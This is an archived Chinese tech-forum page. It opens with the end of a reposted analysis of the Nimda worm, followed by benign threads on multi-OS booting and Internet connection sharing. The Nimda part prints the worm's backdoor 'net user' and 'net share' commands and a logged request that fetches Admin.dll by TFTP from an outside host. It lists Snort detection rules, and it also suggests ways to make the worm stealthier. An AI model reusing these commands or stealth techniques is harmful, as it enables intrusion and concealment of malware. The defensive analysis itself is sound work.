病毒采取以下措施确保自己处于活跃状态
1）把自己复制到windows系统文件夹里命名为riched20.dll（原理见前）
2）把自己复制到windows系统文件夹里命名为load.exe，
修改system.ini把
shell=explorer.exe改为
shell=explorer.exe load.exe -dontrunold
使病毒在下次系统启动时运行。

创建后门：
1）Nimda打开的udp/69虽然目的并不是作后门，但的的确确是一个后门。
2）如果有足够权限将调用"net.exe"执行以下系统命令：
net user guest /add
net user guest /active
net user guest ""
net localgroup Administrators guest
net localgroup Guests guest /add
结果是空密码的guest加到了Administrators组中。
2）如果有足够权限将调用"net.exe"执行以下系统命令：
net share c$=c:\
删除[SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security]的所有子键
结果是C:\设为完全共享。

Nimda的一些不足之处：
无论如何Nimda是一个划时代的东西，它显示了作者高超的编程水平和丰富的安全知识，相形之下CodeBlue显得黯淡了很多,
甚至CodeRedII也不能相比，但还是留下了一些遗憾。

1）Nimda用JavaScript的"window.open"函数来打开readme.eml，这并不可靠，稍具安全常识的人都会调整IE的脚本支持
选项，有些人干脆关掉java，但是用下面这个方法就没问题了：
<frameset cols="0,*"><frame src="readme.eml">

2）存在诸多"TFTP****"并不是Nimda的本意，恰恰是作者没考虑周全。
Winnt的tftp在工作时会创建形如"TFTP3233"的临时文件，如果tftp异常终止，临时文件就不能被删除。
unicode_hole本来就不是一个理想的运行程序的方式，再加上Nimda的tftpd部分的一点小缺陷就导致了
在一个目录下出现大批的"TFTP****"。写一个更可靠的tftpd模块或者在程序中加入删除这些临时文件的
代码，会让Nimda隐蔽性更强。

3）用GET而不是HEAD来扫描的确要好，但如果在编码上参照Whisker的"Stealth Mode"改进一下就更完美了。

其它几个常见问题：

1)Nimda什么时候进入我国？
我手头最早的一行日志是：
2001-09-18 13:40:25 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /scripts/root.exe /c+tftp%20-i%2061.133.3.126%20GET%20Admin.dll%20Admin.dll 502 -
也就是说肯定早于2001-09-18 13:40:25

2)Nimda的作者是谁？
程序的作者在程序中留下了以下标记：
fsdhqherwqi2001
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
可能对最终找出作者有帮助。

3)为什么说Nimda是“概念”蠕虫？
它可以通过至少五种方式传播
它是一个带exe扩展名的dll，可以做为可执行文件运行，也可作为dll运行。
它有智慧：当它名为Admin.dll被运行时，它会把自己复制到windows文件夹命名为mmc.exe并带上参数"-qusery9bnow"运行。
当它名为readme.exe被运行时，它会把自己复制到%temp%带上参数"-dontrunold"运行.
它会把自己的属性设为“系统”“隐藏”，再改写注册表，使“系统”“隐藏”属性的程序在资源管理器中不可见。
它是一个主机扫描器，一个弱点扫描器，一个后门程序；带有多个Exploit，掌握最新的安全信息；它就是一个黑客。

4）Nimda打开的tftpd@udp/69可以用来传送其他文件吗？
不行。Nimda实现的只是一个最基本的tftpd，不包含打开文件句柄的代码，不存在工作目录，仅可以传送自身。
无论请求的是什么文件名，实际得到的都是Nimda。但这个tftpd模块可能存在缓冲溢出问题。

5）如何清除Nimda？
在文件夹选项里设置“显示所有文件”

删除mmc.exe/load.exe/riched20.dll/admin.dll/readme.eml/readme.exe等所有蠕虫文件。
检查所有大小为57344或79225的文件。
可以使用“查找”工具，搜索包含"fsdhqherwqi2001"的*.exe/*.dll和包含"Kz29vb29oWsrLPh4eisrPb09Pb2"的*.eml/*.nws。

检查system.ini。

检查所有文件名中包含default/index/main/readme并且扩展名为htm/html/asp的文件。

删除C:\的共享

最好再检查一下C:\和D:\有没有explorer.exe，除非确信一定没有感染CodeRedII。

重起系统

6）如何避免Nimda入侵？
根本之道是打补丁：
Unicode漏洞：http://www.microsoft.com/technet/security/bulletin/ms00-078.asp
MIME漏洞：http://www.microsoft.com/technet/security/bulletin/ms01-020.asp
IE5.01 SP2：http://www.microsoft.com/windows/ie/downloads/recommended/ie501sp2/default.asp
IE5.5 SP2：http://www.microsoft.com/windows/ie/downloads/recommended/ie501sp2/default.asp

其他解决方案：
打开IE的“工具-->internet选项-->安全-->自定义级别-->文件下载”选“禁用”。
删除所有不需要的默认虚拟目录，或者只给纯脚本执行权，最好不要把任何web目录放在系统分区。
检查共享设置，Win9X的机器不要开完全共享，可以开只读共享，所有共享都要设置口令。

由于Nimda可以利用CodeRedII创建的后门，所以需打上idq_overflow的补丁，检查C:\和D:\
有没有explorer.exe，检查web目录中有没有root.exe。具体见：
http://www.cnns.net/article/db/1722.htm

7）Nimda发送的邮件有特征吗？
Nimda发送的邮件主题是随机的，但通常很奇怪，譬如下面这个：
Subject: 驛埳pic180pic159pic180pic178pic162pic182desktop
不要轻易以HTML方式打开邮件。

8）Nimda可以被监测吗？
当然可以。下面是我写的一个用于snort的过滤规则：

#----------------------------------------------
# Worm.Nimda Ruleset
# Current Database Updated 09/20/2000
# Contact: tombkeeper - tombkeepr@126.com
#----------------------------------------------

preprocessor http_decode: 80 443 8080
preprocessor minfrag: 128
preprocessor portscan: 12.23.34.45/32 3 5 /var/log/snort_portscan.log
# ^^^^^^^^^^^ ^ ^ ^^^^^^^^^^^^^^^^^^^^^^^^^^^
# | | | |
#Your IP address or Network here+ | | |
# | | |
#Ammount of ports being connected-----+ | |
# in this | |
#Interval (in seconds)------------------+ |
# |
#Log file (path/name)----------------------------------+

preprocessor portscan-ignorehosts:
# Hosts to ignore in portscan detection

#---------------------------------------------
# CHANGE THE NEXT LINE TO REFLECT YOUR NETWORK
# (Single system = your ip/32)
var HOME_NET yournet/subnet
#---------------------------------------------

alert tcp any any -> any 80 (msg:"W32/Nimda@mm WORM SCAN!"; flags:PA; content:"/root.exe?/c+dir"; nocase;)
alert tcp any any -> any 80 (msg:"W32/Nimda@mm WORM SCAN!"; flags:PA; content:"/system32/cmd.exe?/c+dir"; nocase;)
alert tcp any any -> any 80 (msg:"W32/Nimda@mm WORM TRANSFER!!"; flags:PA; content:"/root.exe?/c+tftp%20-i"; nocase;)
alert tcp any any -> any 80 (msg:"W32/Nimda@mm WORM TRANSFER!!"; flags:PA; content:"/system32/cmd.exe?/c+tftp%20-i"; nocase;)
alert tcp any any -> any 80 (msg:"W32/Nimda@mm WORM RUN!!!"; flags:PA; content:"/scripts/Admin.dll"; nocase;)
alert tcp any any -> any 80 (msg:"W32/Nimda@mm WORM RUN!!!"; flags:PA; content:"/MSADC/Admin.dll"; nocase;)
alert tcp any any -> any 80 (msg:"W32/Nimda@mm WORM RUN!!!"; flags:PA; content:"/winnt/system32/Admin.dll"; nocase;)
alert udp any 69 -> any any (msg:"W32/Nimda@mm WORM TRANSFER!!"; flags:PA; content:"|15 90 AC 17 36 F7 D8 1B C0 5E 40 5B 5F C9 C2 04 00 55 8B EC 81 EC B0 00|";)
alert tcp any 80 -> any any (msg:"W32/Nimda@mm WORM IN WEB SERVER!!"; flags:PA; content:">window.open("readme.eml"";)
alert tcp any any -> any 25 (msg:"W32/Nimda@mm WORM MAILSEND!!"; flags:PA; content:"UgEAAI1F6Ild6FCNRfxQU2g/AA8AU1NT";)
alert tcp any 110 -> any any (msg:"W32/Nimda@mm WORM MAILRECV!!"; flags:PA; content:"UgEAAI1F6Ild6FCNRfxQU2g/AA8AU1NT";)

一点改进意见：
Nimda用JavaScript的"window.open"函数来打开readme.eml，这并不可靠，稍具安全常识的人都会调整IE的脚本支持
选项，有些人干脆关掉java，但是用下面这个方法就没问题了：
<frameset cols="0,*"><frame src="readme.eml">

作者邮箱：tombkeeper@126.com

[这消息被cjj31编辑过(编辑时间2002-01-19 17:17:10)]

好好学习，天天向上
交友：MSN:cjj8110@hotmail.com
技术交流：OICQ:7777435
51windows

海娃
积分：4489
发帖：1308
来自：湖南－山东
注册：2001-12-02
 发表于 2002-01-18 23:26:31 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP
不错，

不过请把笑脸转换禁止

不然存下来，怎么看呀！

Blueidea Web Team.
Moderator Of Amphitheater Forum
.::天天学习:好好向上::. www.51windows.com
51window_asp_Beta

上一贴 | 下一贴
快速回复 主题：对尼姆达蠕虫的详细分析(转贴)
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


多操作系统安装问与答 - 经 典 论 坛

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙

论坛信使： 发送本页给您的朋友！

经 典 论 坛
计算机技术
多操作系统安装问与答

注意：这是一个归档主题。它是只读的。
此主题先前所在的论坛：计算机技术
发表人 主题: 多操作系统安装问与答
啸

无意
现任版主
积分：6219
发帖：2154
来自：
资格：2000-08-01
 发表于 2002-01-23 21:44:03 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 将本帖子内容输出到 ActiveContent
前段时间在论坛里看到一些朋友问关于多操作系统安装的问题，觉得有必要写点什么东西，就理了一下思路，采取问答的方式写了下面的一篇文章，希望能对大家有所帮助。由于水平有限，可能有些东西说得不对，还请大家多多指正。

一、Windows(98、2000、XP)部分

1、问：我有一块新的硬盘，打算在上面装Windows98和Windows XP双操作系统，请问应该怎么分区和安装呢？

答：在新的硬盘上安装多操作系统是比较容易的事，可以省去重新调整分区的麻烦。根据实际情况可以考虑98装在C盘，XP装在D盘，其中C盘不用太大，一般有1~2G就行，如果98不打算用来运行什么大型程序的，500~600M也就够了；相对而言D盘可以留大一些，一般在5G左右，如果空间不够可以考虑减少，但至少要保证有2G的空间。步骤是是先在C盘装98，然后在98里运行XP的安装程序，选择全新安装，并制定安装位置为D盘。这样等XP安装完成后系统就会自动生成一个屏幕菜单，供你启动的时候选择要进的操作系统。对于Win98和Win2000双操作系统的安装方法与本例同。

2、问：我机子上原来装有Win98,我现在想装Win XP,请问98还有必要保留吗，该选择什么样的安装方式呢？

答：在98下安装XP有两种安装供选择，一种是升级式安装，即只对现有操作系统进行升级，安装完成后机子上只有一种操作系统；一种是全新安装，安装完成后机子上有两个操作系统。对于硬盘空间不是很紧张的朋友，建议还是选择全新安装，因为这样可以把98保留下来，万一XP出什么问题了它还可以应急，我觉得这比怎么什么应急工具都强，毕竟它是一个完整的操作系统，而且相比来说占用的空间很小（一个98系统只有两三百兆，而一个XP系统备份文件就有三百多兆）。

3、问：安装Win98和WinXP(Win2000)双操作系统，我的分区分别需要选用什么样的文件系统呢？

答：对于装98的分区，一般都是选用Fat32文件系统，而对于装XP或2000的分区，一般有Fat32和NTFS两种选择，具体选择那种根据实际情况而定，如果98系统还经常使用，则选用Fat32格式，因为NTFS格式的分区在98下无法识别，如果98系统只在极少数情况下才使用，则建议把装XP的分区转成NTFS格式，因为在XP和2000下NTFS比Fat32更有优势。

4、问：在安装多操作系统的时候都会提到boot.ini,能简要介绍这个文件吗？

答：boot.ini是一个包含完成引导过程所需信息的文本文件，用户可在任何文本编辑器中编辑它，其位置一般在激活分区的根目录下（例如C:\）。 我们前面提到的在XP安装完成后出现的屏幕菜单内容就是由它决定的，但是boot.ini的作用不仅仅是为用户提供菜单选项，这个文件是控制操作系统引导过程的一个重要机制。
下面是一个98和XP双操作系统boot.ini的例子：

[boot loader]
timeout=3
default=multi(0)disk(0)rdisk(0)partition(4)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(4)\WINDOWS="Microsoft Windows XP Professional" /fastdetect
C:\="Microsoft Windows"

里面有两部分内容：第一部分[boot loader]包含了超时规定和操作系统的默认路径；第二部分 [operating systems]包含了安装在计算机上的操作系统的路径，其中multi(0)是适配器的顺序号，disk(0)是磁盘参数信息，rdisk(0)是连接到适配器上的磁盘的顺序号，partition(4)是分区号，partition项一般由XP安装的位置决定，如果是安装在C盘，则应该是partition(1)。
对于修改默认的操作系统和倒计秒数的长度，可以启用2000或XP下的“启动和故障恢复”（右击“我的电脑”，切换到“高级”选项卡，里面就有）来完成，不用直接编辑boot.ini文件。

二、Windows和Linux

5、问：我打算在一个新的硬盘上安装Win98,WinXP,Linux三操作系统，应该怎么做呢？

答：步骤大致如下：
(1)分区。除了如问题1提到的为98和XP各预留一个分区以外，还要预留一个空的分区给Linux,大小由硬盘空间大小和linux的用途决定，如果打算用来运行大量程序的可以预留大一点，如果只想用来学习的，可以留小一点，但如果是安装Red Hat Linux 7.0以上的操作系统，所留空间最好不要小于2G.
(2)安装。先在C盘上装98，然后在D盘上装XP，最后再用Linux的安装盘启动，安装Linux.安装Linux时注意选择默认操作系统，如果经常用Windows,就选Dos为默认，反之则选Linux.
(3)启动。三个系统全部安装完毕后重新启动，将会遇到两个屏幕菜单供选择，第一个是 Linux的lilo菜单，选择是进linux还是进Windows,第二个是前面提到的boot.ini控制的菜单，选择是进98还是进XP.

6、问：我的电脑上原来已经装有Win98和Linux,现在我想加装Win XP,请问应该怎么办？

答：很简单，只要你手头上有进Linux的启动盘（一般linux在安装的时候都会提示制作的，如果没有制作或丢失了可以用linux的安装光盘再做一个）。步骤大致如下：
(1)进98，安装XP(全新安装)，安装完以后你会发现原先Linux的lilo屏幕菜单没有了，没关系，进行第二步。
(2)用Linux启动盘启动，以root身份登陆linux,运行一遍lilo命令，重新启动计算机，看，lilo菜单是不是又回来了？问题解决了 :)

7、问：我的电脑上原来已经装有Win2000,装2000的C盘用的是NTFS格式，而其他盘用的是Fat32格式的。后来我又装了Red Had 7.1,装完以后linux能进去，windows却不能进了，请问是什么回事，该怎么解决呢？

答：这里首先要介绍一下Linux系统设备的命名规则。在Linux里，各种设备和分区的命名方法完全不同于Dos,软驱，硬盘以及硬盘分区都有各自的设备特殊文件，例如：

   /dev/hda     表示第一个IDE硬盘（整个）
   /dev/hda1    表示第一个硬盘的第一个主分区
   /dev/hda2    表示第一个硬盘的第二个主分区
   /dev/hda3    表示第一个硬盘的扩展分区
   /dev/hda5    表示第一个硬盘的第一个逻辑分区
   /dev/hda6    表示第一个硬盘的第二个逻辑分区
   /dev/hdb     表示第二个硬盘（整个）

其中hda1对应着Windows里的C盘，而hda5一般对应着Windows的D盘。在linux安装的时候安装程序会自动寻找windows操作系统所在的分区，因为这里我们把C盘设成了NTFS格式的，有些linux安装程序不认这个格式，就把其他fat32格式的盘当作windows的启动盘了，这里应该就是这种情况。
解决的办法也很简单，只要以root身份登陆linux,用文本编辑器打开在/etc目录下的lilo.conf,找到
other=/dev/hda5
optional
label=dos
这一段，把hda5(也可能hda6或其他)改成hda1,存盘，然后运行一遍lilo命令，重新启动，问题应该就能解决了。

8、问：我的机子上原来在C盘装了win98,D盘上装了win XP,后来为了装linux,我用分区魔术师从C盘上分出了两个区，但是当linux装上以后，win xp就不能进了，提示找不到hal.dll文件，请问是什么回事？

答：原因出在boot.ini文件上。正如问题4中提到的，partition表示分区号，原来没有从C盘分出两个区时xp所在的分区号是2（D盘），重新分区以后，XP所在的分区号就应该是4了，但boot.ini文件并不会自动改过来的，所以在启动XP时，引导程序还是跑到第二个分区里区找hal.dll文件，此时第二分区里已经是linux的文件了，当然会提示找不到，所以XP无法启动.解决的办法很简单，只要把boot.ini 里的partition(2)改成partition(4)就行了。

9、问：我在Linux里可以读写Dos分区里的文件吗，应该怎么做？

答：在linux里可以读写Fat32格式的文件，而对NTFS格式的文件只能读，不能写。方法和平常linux文件系统的加载相同。例如我要在linux里读我机子上D盘的内容，我要做的是运行下面的命令来加载D盘的文件系统：

[root@localhost /root]# mkdir /mnt/d
[root@localhost /root]# mount -t msdos /dev/hda5 /mnt/d/

这样当你再访问/mnt下面的d目录时，里面就是你d盘上的内容。

还有一种更简单的方法是在/etc目录下的fstab文件里加上下面这一行(前提是 /mnt/d存在)：
/dev/hda5 /mnt/d msdos defaults 0 0

这样只要一启动linux，系统就会自动加载hda5上的文件系统，我们直接点击 /mnt/d就可以看到d盘上的内容。

上面就是我对多系统安装问题的一些总结，如果还有什么问题的，欢迎跟贴提问。

希望大家也能写些自己在计算机方面的体会和经验，和大家一起共享，这里就算是先抛砖引玉吧 :)

宠辱不惊，坐看庭前花开花落；去留无意，任天上云卷云舒......

Blueidea Web Team.
Moderator Of Computer Technology Forum

不知道

终级用户
积分：682
发帖：201
来自：
资格：2001-08-17
 发表于 2002-01-23 23:51:43 按此观看不知道的个人资料 按此发邮件给不知道 发送悄悄话给不知道 编辑/删除帖子 将本帖子内容输出到 ActiveContent
我正要重装系统，收下了，谢谢。

我要把NTFS格式转为FAT32，上面的数据是否会破坏？

知之为知之，不知为不知！！
len

SlowHorse
积分：1198
发帖：572
来自：hebei
资格：2001-09-29
 发表于 2002-01-24 10:28:39 按此观看len的个人资料 按此发邮件给len 访问len的主页 len 的 oicq 是3248586,查看 3248586 的资料 发送悄悄话给len 编辑/删除帖子 将本帖子内容输出到 ActiveContent
不知道在上个帖子中说
引用:
我正要重装系统，收下了，谢谢。

我要把NTFS格式转为FAT32，上面的数据是否会破坏？

FAT32转换为NTFS格式,这个过程是不能逆转的. :(

UFO Bulletin Board ====> 不明飞行物
不知道

终级用户
积分：682
发帖：201
来自：
资格：2001-08-17
 发表于 2002-01-24 14:19:50 按此观看不知道的个人资料 按此发邮件给不知道 发送悄悄话给不知道 编辑/删除帖子 将本帖子内容输出到 ActiveContent
看来为了兼容性还是用FAT32比较好了。

知之为知之，不知为不知！！
浸食·花葬

极度色郎
积分：7812
发帖：2959
来自：|翅膀|
资格：2001-07-09
 发表于 2002-01-24 14:23:23 按此观看浸食·花葬的个人资料 按此发邮件给浸食·花葬 访问浸食·花葬的主页 浸食·花葬 的 oicq 是7368317,查看 7368317 的资料 发送悄悄话给浸食·花葬 编辑/删除帖子 将本帖子内容输出到 ActiveContent
len在上个帖子中说
引用:

FAT32转换为NTFS格式,这个过程是不能逆转的. :(

格了不就回來了 :confused:

幕末 ——
京都に人斬り拔刀齋と呼ばれた志士がぃた.
修羅さながらに人を斬り.その血刀を以って新
時代『明治』を切り拓ぃたその男は.動亂の
終結と共に人々の前から姿を消した ——
不知道

终级用户
积分：682
发帖：201
来自：
资格：2001-08-17
 发表于 2002-01-24 16:40:27 按此观看不知道的个人资料 按此发邮件给不知道 发送悄悄话给不知道 编辑/删除帖子 将本帖子内容输出到 ActiveContent
浸食·花葬在上个帖子中说
引用:
len在上个帖子中说
引用:

FAT32转换为NTFS格式,这个过程是不能逆转的. :(

格了不就回來了 :confused:

格了回来数据还要不要！！

知之为知之，不知为不知！！
wangfeng

超级用户
积分：330
发帖：102
来自：辽宁
资格：2001-12-23
 发表于 2002-01-24 18:21:48 按此观看wangfeng的个人资料 按此发邮件给wangfeng 访问wangfeng的主页 wangfeng 的 oicq 是56202481,查看 56202481 的资料 发送悄悄话给wangfeng 编辑/删除帖子 将本帖子内容输出到 ActiveContent
NTFS——》FAT32可以随意逆转 用PQ 啊

我曾经问个不休？………………………………………………？
cfluodongyu2

超级用户
积分：336
发帖：84
来自：
资格：2002-05-18
 发表于 2002-05-18 14:07:22 按此观看cfluodongyu2的个人资料 按此发邮件给cfluodongyu2 cfluodongyu2 的 oicq 是17696170,查看 17696170 的资料 发送悄悄话给cfluodongyu2 编辑/删除帖子 将本帖子内容输出到 ActiveContent
聪明,我们应该多了解一些软件,有很多实用的,一个人找不全的,互相介绍嘛.
NTFS——》FAT32可以随意逆转 用PQ 啊

好的交流能使我们走近完美！
hztcm

初级用户
积分：13
发帖：2
来自：
资格：2002-05-22
 发表于 2002-05-22 07:18:29 按此观看hztcm的个人资料 按此发邮件给hztcm 发送悄悄话给hztcm 编辑/删除帖子 将本帖子内容输出到 ActiveContent
老师：
我在C盘安装了WIN98，在D盘安装了WIN2000，在WIN2000起动后，我无意间用WINDOWS优化大师优化了一下系统，在起动的默认选项里面一不小心选了一个WIN98作为默认起动系统，现在我怎么也不知道怎样去起动WIN2000了。有谁可以告诉我怎么办吗？
多谢！！
在C盘里用WINDOWS优化大师找不到在WIN2000里的那个选项，可能是在FAT格式下不支持这个功能吧，真是要命！WIN2000我是安装的SERVICE版。

啸

无意
现任版主
积分：6219
发帖：2154
来自：
资格：2000-08-01
 发表于 2002-05-22 10:03:01 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 将本帖子内容输出到 ActiveContent
把boot.ini里的内容贴出来看看，我觉得只是被改动了一下下而已，应该不难解决。

宠辱不惊，坐看庭前花开花落；去留无意，任天上云卷云舒......

Blueidea Web Team.
Moderator Of Computer Technology Forum

xymily

初级用户
积分：106
发帖：68
来自：
资格：2002-03-28
 发表于 2002-05-22 23:14:00 按此观看xymily的个人资料 按此发邮件给xymily 访问xymily的主页 xymily 的 oicq 是7658826,查看 7658826 的资料 发送悄悄话给xymily 编辑/删除帖子 将本帖子内容输出到 ActiveContent
有一问题请教：
我的系统是：win2000 adv server,和winxp
由于使用了一条不兼容的内存，导致winxp不能进了。
提示是:d:\windows\system32\config\system
的起动失败。要用安装盘或启动盘修复，
但我用了光盘修复。按它的步骤。进入以上目录。不知道做干什么？
请教解决办法

想赢得别人对你的尊重，敬爱
首先靠的是自强。
啸

无意
现任版主
积分：6219
发帖：2154
来自：
资格：2000-08-01
 发表于 2002-05-23 08:39:14 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 将本帖子内容输出到 ActiveContent
一个比较简单的办法是用xp的安装盘进行安装，等系统文件拷完了，第一次重起时，退出安装，应该就可以进xp了。

至于修复，只看过2000的，不知道对xp是否也适用，可以看一下：

http://www.blueidea.com/bbs/NewsDetail.asp?id=372894

宠辱不惊，坐看庭前花开花落；去留无意，任天上云卷云舒......

Blueidea Web Team.
Moderator Of Computer Technology Forum

xymily

初级用户
积分：106
发帖：68
来自：
资格：2002-03-28
 发表于 2002-05-23 12:37:48 按此观看xymily的个人资料 按此发邮件给xymily 访问xymily的主页 xymily 的 oicq 是7658826,查看 7658826 的资料 发送悄悄话给xymily 编辑/删除帖子 将本帖子内容输出到 ActiveContent
但用光盘进行第二次安装的时候，它提示，在我的D盘有别一个系统。
即是原来的WINXP，但提示不进行覆盖，说不推荐在一个盘上有两个系统。
要是重装的话，我怕在我的D盘有两个WINXP.
它不进行文件的复制。而是只能它装在别的盘，或把这个盘的格式转换成ntfs。
再安装，那就不是修复了.

想赢得别人对你的尊重，敬爱
首先靠的是自强。
这是个归档主题，您不能回复！
管理选项： 移动归档主题 | 删除归档主题


win98 win200 共享上网全攻略.... - 经 典 论 坛

dreamweaver MX 功能探索

论坛信使： 发送本页给您的朋友！

经 典 论 坛
计算机技术
win98 win200 共享上网全攻略....

注意：这是一个归档主题。它是只读的。
此主题先前所在的论坛：计算机技术
发表人 主题: win98 win200 共享上网全攻略....
yunbin

经典强盗
现任版主
积分：2397
发帖：1033
来自：火星
资格：2001-09-27
 发表于 2002-04-12 16:39:48 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 将本帖子内容输出到 ActiveContent
近来好像有挺多的人问这个...........

WinGate和Internet共享的最佳配合<--------Click here

Windows 2000共享上网的设置<--------Click here

Windows 98SE共享上网的设置<--------Click here

Win2000用ADSL共享上网的设置<--------Click here

Sygate 4.0共享上网的设置<--------Click here

Wingate 4.3.0共享上网的设置 <--------Click here

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

fanbl

终级用户
积分：2408
发帖：652
来自：
资格：2002-03-20
 发表于 2002-04-27 11:39:35 按此观看fanbl的个人资料 按此发邮件给fanbl 访问fanbl的主页 发送悄悄话给fanbl 编辑/删除帖子 将本帖子内容输出到 ActiveContent
为什么我的机器,主机IP设为192.168.0.1后.其它机器不设IP可共享上网.如果其它机器设了IP如192.168.0.2等后不能共享上网.不论是win98,winxp还是win2k我都试过.都是这样.为什么呀?

我是菜鸟请多关照
啸

无意
现任版主
积分：6225
发帖：2154
来自：
资格：2000-08-01
 发表于 2002-04-30 21:47:27 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 将本帖子内容输出到 ActiveContent
算了，我还是转过来吧，别人骂就骂吧.后面两篇图太多了，不好转。

WinGate和Internet连接共享的最佳配合

http://soft.km169.net/soft/tip/sharegate.htm

原作者: 冯健

提起共享上网来，很多人都会想到WinGate，该软件最大的优点是：通过缓存网页内容，加快了浏览速度。然而，很多用户发现在WinGate的配置很麻烦，想要使用QQ、Foxmail、网络蚂蚁、网际快车、CuteFTP等软件不下一番功夫还真不行！而且，光设置好服务器还不行，客户机也要做相应的设置，非常麻烦。如何才能即利用WinGate的缓存，加快浏览速度，又不用进行复杂的配置呢？在建设恩平电大校园网的过程中，我们找到一个好办法：WinGate和Windows自带的连接共享的合用。具体做法如下：

1、安装“Internet连接共享”
安装之前，请确认你的局域网是连通的，并准备好一张软盘。Windows的“Internet连接共享”安装过程比较简单，按照提示操作即可。如果系统里没有“Internet连接共享”，可以通过“添加/删除程序→Windows组件→Internet工具”进行添加。

2、安装WinGate
软件的安装比较简单，一路回车即可，这里就不多介绍了。服务器使用Windows 2000或Windows 98都可以，要注意的是，不同的操作系统需要安装对应版本的WinGate。

3、WinGate的配置
进入WinGate的使用界面后，主要设置一下WinGate的缓存属性，缓存的大小设置为不小于500MB即可使用。

4、IE浏览器的配置
运行IE浏览器，打开Internet选项，进行局域网设置，设置如图2，这里我们的服务器的IP地址为192.168.0.1，端口为80，确定回车。

配置完毕后，我们即可同时运行WinGate和Windows的连接共享来完成代理服务器的功能。使用中将两者放入启动目录，服务器打开即可运行使用。现在我们可以在Internet中使用QQ、Foxmail、CuteFTP、网络蚂蚁等软件了。此时，服务器利用WinGate为客户机提供网页的浏览服务，而通过Windows自带的连接共享为客户机提供QQ、邮件、上传、下载等服务。因此我们在使用中不但能享受上网冲浪的快捷，也避免了许多不必要的设置。

还有一点必须注意，如果你的服务器在单位中还担当局域网的Web服务器、FTP 服务器、邮件服务器的话，如使用Windows 2000的IIS 5.0，安装WinGate后，你会发现局域网的FTP和局域网电子邮件无法使用，别着急，完成以下配置后即可使用。

1、运行服务器的WinGate，删除WinGate中的除WWW Proxy Server服务器外的所有用户服务器。

2、改变WinGate中WWW Proxy Server的端口为8080。

3、最后参照前面IE浏览器的Internet选项中局域网设置的方法，将客户机的端口改为8080即可。

通过以上设置可以使用你们单位以前的各种局域网服务功能了。朋友，怎么样，想试试请赶快动手吧

利用Win 2K实现Internet连接共享

http://soft.km169.net/soft/tip/w2kshare.htm

    上个月公司联网了，要求所有用户计算机通过服务器共享Internet连接。对于我这个网管来说，迫切需要实现Http、Ftp、POP3、Smtp等功能，同时同事还要我给他们开通Oicq，以便休息时间可以聊天。

    用什么代理工具好呢？这颇费了我一番时间研究，常用的代理软件有MS Proxy 2.0、Wingate、Sygate等等。MS Proxy 2.0和Wingate配置太过复杂，而且还要在客户端安装软件，先被否决了。去临近的单位考察了一下Sygate 4.0，发现很不错，已经初步决定用Sygate 4了。转折点是前两天为了提高服务器的稳定性，把服务器重新安装了一遍，升级成为Win2000服务器版。

    在阅读Win2000帮助信息时，无意中发现Win2000自带了Internet连接共享功能，试用以后发现真的不错，Http、Ftp、POP3、Smtp和Oicq等功能都能实现。不敢独享，和大家共同探讨一下。

    一．服务器上Win2000的安装配置

    1.Win2000使用典型安装完毕，配置为主域服务器。并配置网卡的ip为192.168.0.1，子网为255.255.255.0，将此网卡连接到服务器所在的网络，使用TCP/IP协议。在现有的网络中，不应该将此功能与其他 Windows 2000 Server 域控制器、DNS 服务器、网关、DHCP 服务器，或配置为静态 IP 地址的系统一起使用。

    2.添加域名服务系统（DNS）
    通过 控制面板－>添加删除程序－>网络服务－>域名服务系统（DNS）－>打勾－>确定来添加。如图所示：

    二．服务器上添加连接到Internet的连接

    我目前是通过服务器端modem拨号上网的方式来实现的。要注意的是配置 Internet 连接共享，必须以 Administrators 组的成员来登录服务器。

    1.安装modem

    通过 控制面板－>电话和调制解调器选项－>添加 来添加外置modem

    2.添加拨号连接

    通过 控制面板－>网络和拨号连接选项－>新建新连接－>出现网络连接向导

    在网络连接向导中选－>单击"下一步"－>选拨号到Internet－>单击"下一步"－>出现Internet连接向导。

    在Internet连接向导中－>选手动设置Internet连接或通过局域网连接－>单击"下一步"－>通过电话线和调制解调器连接-->单击"下一步"-->输入ISP提供的上网电话号码-->单击"下一步"－>输入ISP提供的用户名和密码-->单击"下一步"－>单击"下一步"－>问是否建立邮件帐号时选否－>单击"下一步"－>完成。

    3. 共享Internet的连接

    在新建立的拨号连接帐号上点击右键-->选属性-->共享访问-->在"启动此连接的Internet连接共享"打勾-->确定。

    三、在服务器和客户机器上配置Internet连接共享的Internet选项

    1.打开 Internet Explorer-->单击"手工设置 Internet 连接，或者通过局域网 (LAN) 连接"，-->单击"下一步" --> "通过局域网 (LAN) 连接" -->单击"下一步"--> 单击"自动查找代理服务器（推荐）"复选框-->单击"下一步" -->单击"否" -->单击"下一步"" -->单击"完成"。
    2.在"连接"选项卡上，单击"不进行拨号连接"，然后单击"局域网设置"。
    3.在"自动配置"中，清除"自动检测设置"和"使用自动配置脚本"复选框。
    4.在"代理服务器"中，清除"使用代理服务器"复选框。

    四、在客户机上设置网卡配置

    配置客户机的网卡为自动获得IP地址，网关为空。
    到此配置完毕，重新启动服务器和客户机。服务器上拨号上网，在客户机上登录服务器后，就可以通过服务器的代理实现各种Internent功能了。

Win98SE的Internet共享！

http://soft.km169.net/soft/tip/winshare.htm

